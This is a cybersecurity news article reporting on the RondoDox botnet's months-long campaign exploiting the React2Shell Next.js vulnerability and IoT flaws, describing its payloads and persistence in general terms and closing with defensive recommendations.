Cybersecurity experts have uncovered a persistent RondoDox botnet campaign that has been targeting Internet of Things devices and web applications for over nine months, exploiting recently disclosed vulnerabilities in React Server Components and Next.js. The campaign, active through December 2025, has leveraged the critical React2Shell flaw, assigned CVE-2025-55182, which carries a maximum CVSS score of 10.0, allowing unauthenticated attackers to execute remote code on vulnerable systems. CloudSEK highlighted the scale of the threat, revealing that over 90,000 instances remain exposed worldwide, with the United States alone hosting more than 68,000 susceptible devices, followed by Germany, France, and India.
RondoDox, which emerged in early 2025, has expanded its capabilities over the months, integrating N-day vulnerabilities such as CVE-2023-1389 and CVE-2025-24893 into its attack toolkit. Prior reporting from Darktrace, Kaspersky, and VulnCheck has already documented early attempts to exploit React2Shell to propagate the botnet. The campaign appears to have progressed through three phases, beginning with reconnaissance and manual vulnerability scans in March and April 2025, followed by daily mass probing of popular web platforms including WordPress, Drupal, and Struts2, as well as IoT devices such as Wavlink routers. By mid-2025, RondoDox attacks had shifted to automated, large-scale deployments that continued hourly until early December.
During the latest detected activity, attackers focused on identifying vulnerable Next.js servers before deploying malicious payloads. These included cryptocurrency miners located in the /nuts/poop path, a botnet loader and health checker under /nuts/bolts, and a Mirai botnet variant stored in /nuts/x86. The /nuts/bolts component is particularly aggressive, terminating competing malware and coin miners before installing the primary bot binary from its command-and-control infrastructure. Some variants have been observed removing existing botnets, Docker-based payloads, remnants from previous campaigns, and associated cron jobs, while establishing persistence by writing to /etc/crontab. Continuous scanning of the /proc directory ensures non-whitelisted processes are killed approximately every 45 seconds, reducing the likelihood of reinfection by rival actors.
Security specialists recommend that organizations update Next.js to the latest patched versions immediately, segment IoT devices into dedicated VLANs, implement Web Application Firewalls, and closely monitor for unusual process activity. Blocking known command-and-control servers associated with RondoDox can further mitigate exposure. As botnet campaigns increasingly exploit both web application frameworks and IoT devices, proactive monitoring and rapid patching remain critical to limiting the spread and impact of these threats.
Follow the SPIN IDG WhatsApp Channel for updates across the Smart Pakistan Insights Network covering all of Pakistan’s technology ecosystem.
